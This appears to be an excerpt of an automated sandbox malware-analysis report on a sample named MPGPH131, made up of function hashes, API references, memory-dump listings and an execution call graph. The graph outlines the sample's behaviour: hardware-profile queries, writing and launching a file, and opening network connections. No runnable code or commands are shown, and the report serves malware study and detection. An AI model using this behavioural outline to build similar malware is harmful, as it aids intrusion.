                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: 80e264b21f34976b6bf6484267a8561e0e546724967965745aa5010f9c196d8c
                                    • Instruction ID: ecadccc9c029574b4aa03c6224bf2cc2ad88356f850395210eee04ce2f320956
                                    • Opcode Fuzzy Hash: 80e264b21f34976b6bf6484267a8561e0e546724967965745aa5010f9c196d8c
                                    • Instruction Fuzzy Hash: 98612771A002089FDB08DB68DC85BAEBBB5FF84314F148618F415E7792EB74AA8487D1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3946
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A395F
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3A97
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3AB0
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3C16
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3C2F
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A4479
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A4492
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 67f0856ca8c4f0a9781fcac27f8960ee0119878b42d4432d1990ce2fd32381c8
                                    • Instruction ID: 608fd010909d0e36fff6e03786e85f6cbe4fadffd1502c0fd638d7a98cc45c84
                                    • Opcode Fuzzy Hash: 67f0856ca8c4f0a9781fcac27f8960ee0119878b42d4432d1990ce2fd32381c8
                                    • Instruction Fuzzy Hash: 1951D070C01258DFEF14DBA8CD85BDEBBB4BF46304F144258E055A7682D7746A88CB62
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00833C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: ba723654d6c01babdfb7ddbcd5112f6d87b1deb18b30d5540261661d822906ec
                                    • Instruction ID: 69dbacdfd89e02f1a3e756a8d3ad0db787793b84228586769ec533d15876319d
                                    • Opcode Fuzzy Hash: ba723654d6c01babdfb7ddbcd5112f6d87b1deb18b30d5540261661d822906ec
                                    • Instruction Fuzzy Hash: ED1193B29007086BC710DE59D805B96B7E8EF85320F14892AFD58D7641F770A954CBD1
                                    Strings
                                    • unordered_map/set too long, xrefs: 008A2F43
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 15a8e40ab3b9a720bbc226ac1cd9138e596cb45eb4fd09cee6aaccd3d5ff5f5e
                                    • Instruction ID: 97c2cf56752f55eb0153d999ddb41ea8c71a43833ca59694411cbe95696e99a7
                                    • Opcode Fuzzy Hash: 15a8e40ab3b9a720bbc226ac1cd9138e596cb45eb4fd09cee6aaccd3d5ff5f5e
                                    • Instruction Fuzzy Hash: 28E1D171A002099FDB28DF6CC894A6DBBA1FF89310F148369E819DB795E730ED51CB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0083844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: 8865f9ca2000c68dc474f62161b402a8e263f8027221041d7aa81b5cbe19419e
                                    • Instruction ID: d3418e3e5ea75af765122dc639ca0fe3fa29b5bdb2028161d1030390b89fc7e3
                                    • Opcode Fuzzy Hash: 8865f9ca2000c68dc474f62161b402a8e263f8027221041d7aa81b5cbe19419e
                                    • Instruction Fuzzy Hash: 82C1E171910749DFDB08CF68CC85BADBB72FF95304F148248E404AB692DB74AA84CB91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00838051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00838060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: 11895a3bf62bd962d17445be7e7a22b3d6937293ef071da762782ce7f1710bff
                                    • Instruction ID: 1831bca9e01808b1a37b215b0365e21a095703352ce90d98bf2e7177d9c66ae6
                                    • Opcode Fuzzy Hash: 11895a3bf62bd962d17445be7e7a22b3d6937293ef071da762782ce7f1710bff
                                    • Instruction Fuzzy Hash: B89107719002089FDB18DF68CC95B9EBBB1FF85314F14425DF410AB692DBB4EA84C791
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00833C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: ee13bcdeeac3d293a727f89d084407975a48309561f834178367d3d510bed3e3
                                    • Instruction ID: bf65cef557152a844086f357d429c37ed0becb8e2df247227c6f83ebe9463675
                                    • Opcode Fuzzy Hash: ee13bcdeeac3d293a727f89d084407975a48309561f834178367d3d510bed3e3
                                    • Instruction Fuzzy Hash: B141E2B1900608ABC714DF59C845BAAF7F8FF85720F14861AF954E7681E774AA408BE1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A4E29
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A4E42
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A594D
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A5966
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: ffedefc0a964181ccb1d98b4377fcdf068f25662779c19c377b641d801048940
                                    • Instruction ID: fea0bcf48620ad224774cd9c87744dc637ea19baed147d106c0b7e148078be55
                                    • Opcode Fuzzy Hash: ffedefc0a964181ccb1d98b4377fcdf068f25662779c19c377b641d801048940
                                    • Instruction Fuzzy Hash: EE51E2B0C00648DFEF14DFA4DC85BDEBBB4FF46304F184259E455AB682D7746A888B52
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 008A99F1
                                    Strings
                                    • type must be string, but is , xrefs: 008A9A58
                                    • type must be boolean, but is , xrefs: 008A9AE2
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: 85336d12a36526499f48fb2b31c4dc688bfb4f36d62f0316d3282c46069c449c
                                    • Instruction ID: ebc93930da12e310e6cf2037c2ed1998ad3f802404b526dc2d2ad3eeb81ad4e8
                                    • Opcode Fuzzy Hash: 85336d12a36526499f48fb2b31c4dc688bfb4f36d62f0316d3282c46069c449c
                                    • Instruction Fuzzy Hash: FA316CB5904248EFDB14EBA8D842B9EB7A8FB44710F144669F415D7AC2EB34AA04C792

                                    Execution Graph

                                    Execution Coverage:1.6%
                                    Dynamic/Decrypted Code Coverage:2%
                                    Signature Coverage:0%
                                    Total number of Nodes:250
                                    Total number of Limit Nodes:41
                                    execution_graph 24940 944a90 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 24599 a16ba6 24600 a16bb9 ___std_exception_copy 24599->24600 24605 a168fd 24600->24605 24602 a16bce 24612 a11f4c RtlAllocateHeap ___std_exception_copy 24602->24612 24604 a16bdb 24607 a16909 std::_Locinfo::_Locinfo_dtor 24605->24607 24606 a1690f 24622 a12193 RtlAllocateHeap ___std_exception_copy __Getctype 24606->24622 24607->24606 24609 a16952 24607->24609 24613 a16a80 24609->24613 24611 a1692a 24611->24602 24612->24604 24614 a16a93 24613->24614 24615 a16aa6 24613->24615 24614->24611 24623 a169a7 24615->24623 24617 a16ac9 24621 a16b57 24617->24621 24627 a13041 24617->24627 24621->24611 24622->24611 24624 a16a10 24623->24624 24625 a169b8 24623->24625 24624->24617 24625->24624 24636 a1bbad SetFilePointerEx RtlAllocateHeap ___std_exception_copy 24625->24636 24628 a1305a 24627->24628 24632 a13081 24627->24632 24628->24632 24637 a239f2 24628->24637 24630 a13076 24644 a22dfb 24630->24644 24633 a1bbed 24632->24633 24688 a1bacc 24633->24688 24635 a1bc06 24635->24621 24636->24624 24638 a23a13 24637->24638 24639 a239fe 24637->24639 24638->24630 24651 a1acaf RtlAllocateHeap __dosmaperr 24639->24651 24641 a23a03 24652 a12210 RtlAllocateHeap ___std_exception_copy 24641->24652 24643 a23a0e 24643->24630 24646 a22e07 std::_Locinfo::_Locinfo_dtor 24644->24646 24645 a22e0f 24645->24632 24646->24645 24647 a22e48 24646->24647 24649 a22e8e 24646->24649 24667 a12193 RtlAllocateHeap ___std_exception_copy __Getctype 24647->24667 24649->24645 24653 a22f0c 24649->24653 24651->24641 24652->24643 24654 a22f34 24653->24654 24666 a22f57 24653->24666 24655 a22f38 24654->24655 24657 a22f93 24654->24657 24673 a12193 RtlAllocateHeap ___std_exception_copy __Getctype 24655->24673 24658 a22fb1 24657->24658 24659 a1bbed 2 API calls 24657->24659 24668 a22a51 24658->24668 24659->24658 24662 a23010 24664 a23079 WriteFile 24662->24664 24662->24666 24663 a22fc9 24663->24666 24674 a22622 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor _ValidateLocalCookies std::locale::_Locimp::_Locimp 24663->24674 24664->24666 24666->24645 24667->24645 24675 a2e7b4 24668->24675 24670 a22a63 24672 a22a91 24670->24672 24684 a17780 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor ___std_exception_copy 24670->24684 24672->24662 24672->24663 24673->24666 24674->24666 24676 a2e7c1 24675->24676 24677 a2e7ce 24675->24677 24685 a1acaf RtlAllocateHeap __dosmaperr 24676->24685 24680 a2e7da 24677->24680 24686 a1acaf RtlAllocateHeap __dosmaperr 24677->24686 24679 a2e7c6 24679->24670 24680->24670 24682 a2e7fb 24687 a12210 RtlAllocateHeap ___std_exception_copy 24682->24687 24684->24672 24685->24679 24686->24682 24687->24679 24693 a2814e 24688->24693 24690 a1bade 24691 a1bafa SetFilePointerEx 24690->24691 24692 a1bae6 24690->24692 24691->24692 24692->24635 24694 a28170 24693->24694 24695 a2815b 24693->24695 24700 a28195 24694->24700 24708 a1ac9c RtlAllocateHeap __dosmaperr 24694->24708 24706 a1ac9c RtlAllocateHeap __dosmaperr 24695->24706 24697 a28160 24707 a1acaf RtlAllocateHeap __dosmaperr 24697->24707 24700->24690 24701 a281a0 24709 a1acaf RtlAllocateHeap __dosmaperr 24701->24709 24702 a28168 24702->24690 24704 a281a8 24710 a12210 RtlAllocateHeap ___std_exception_copy 24704->24710 24706->24697 24707->24702 24708->24701 24709->24704 24710->24702 24711 998610 24712 998657 24711->24712 24715 998628 std::locale::_Setgloballocale 24711->24715 24716 99ba20 24712->24716 24714 99866a 24717 99bb6c 24716->24717 24718 99ba45 24716->24718 24739 932040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 24717->24739 24721 99bab3 24718->24721 24722 99baa6 24718->24722 24724 99ba5a 24718->24724 24720 99bb71 24740 931fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 24720->24740 24727 a0cd02 std::_Facet_Register 2 API calls 24721->24727 24729 99ba6a std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 24721->24729 24722->24720 24722->24724 24731 a0cd02 24724->24731 24727->24729 24730 99bb2a std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 24729->24730 24741 a12220 RtlAllocateHeap ___std_exception_copy __Getctype 24729->24741 24730->24714 24732 a0cd07 std::_Facet_Register 24731->24732 24734 a0cd21 24732->24734 24736 931fa0 Concurrency::cancel_current_task 24732->24736 24742 a1b99c 24732->24742 24734->24729 24735 a0cd2d 24735->24735 24736->24735 24748 a0e0c1 RtlAllocateHeap RtlAllocateHeap ___std_exception_destroy ___std_exception_copy 24736->24748 24738 931fe3 24738->24729 24739->24720 24740->24729 24743 a2489d __Getctype std::_Facet_Register 24742->24743 24744 a248db 24743->24744 24745 a248c6 RtlAllocateHeap 24743->24745 24749 a1acaf RtlAllocateHeap __dosmaperr 24744->24749 24745->24743 24747 a248d9 24745->24747 24747->24732 24748->24738 24749->24747 24750 54c09c6 GetCurrentHwProfileW GetCurrentHwProfileW 24949 9aca10 RtlAllocateHeap 24751 54c0c42 24752 54c0bca GetCurrentHwProfileW 24751->24752 24754 54c0c39 24751->24754 24752->24754 24964 938b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 24965 94a100 7 API calls 3 library calls 24942 944ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 24970 932540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::locale::_Locimp::_Locimp 24765 54c09ae GetCurrentHwProfileW 24770 f07000 24772 f07044 GetPEB 24770->24772 24773 f07077 CreateFileA 24772->24773 24775 f07265 24773->24775 24776 f0722d 24773->24776 24777 f07246 WriteFile 24776->24777 24778 f07244 24776->24778 24779 f07255 FindCloseChangeNotification WinExec 24777->24779 24778->24779 24779->24775 24781 a12dd0 24784 a12d0e 24781->24784 24783 a12de2 24787 a12d1a std::_Locinfo::_Locinfo_dtor 24784->24787 24785 a12d21 24802 a1acaf RtlAllocateHeap __dosmaperr 24785->24802 24787->24785 24789 a12d41 24787->24789 24788 a12d26 24803 a12210 RtlAllocateHeap ___std_exception_copy 24788->24803 24791 a12d53 24789->24791 24792 a12d46 24789->24792 24798 a240f8 24791->24798 24804 a1acaf RtlAllocateHeap __dosmaperr 24792->24804 24795 a12d5c 24797 a12d31 24795->24797 24805 a1acaf RtlAllocateHeap __dosmaperr 24795->24805 24797->24783 24799 a24104 std::_Lockit::_Lockit std::_Locinfo::_Locinfo_dtor 24798->24799 24806 a2419c 24799->24806 24801 a2411f 24801->24795 24802->24788 24803->24797 24804->24797 24805->24797 24810 a241bf 24806->24810 24807 a24205 24807->24801 24809 a24220 24816 a24823 RtlAllocateHeap __dosmaperr 24809->24816 24810->24807 24812 a23e63 24810->24812 24813 a23e70 __Getctype std::_Facet_Register 24812->24813 24814 a23eae __dosmaperr 24813->24814 24815 a23e9b RtlAllocateHeap 24813->24815 24814->24809 24815->24813 24815->24814 24816->24807 24818 94db60 WSAStartup 24819 94db98 24818->24819 24822 94dc56 24818->24822 24820 94dc24 socket 24819->24820 24819->24822 24821 94dc3a connect 24820->24821 24820->24822 24821->24822 24823 94dc4c closesocket 24821->24823 24823->24820 24823->24822 24952 94e460 6 API calls 24825 a16658 24826 a1666b ___std_exception_copy 24825->24826 24831 a16533 24826->24831 24828 a16677 24838 a11f4c RtlAllocateHeap ___std_exception_copy 24828->24838 24830 a16683 24832 a1653f std::_Locinfo::_Locinfo_dtor 24831->24832 24833 a16549 24832->24833 24835 a1656c 24832->24835 24853 a12193 RtlAllocateHeap ___std_exception_copy __Getctype 24833->24853 24837 a16564 24835->24837 24839 a165ca 24835->24839 24837->24828 24838->24830 24840 a165d7 24839->24840 24841 a165fa 24839->24841 24865 a12193 RtlAllocateHeap ___std_exception_copy 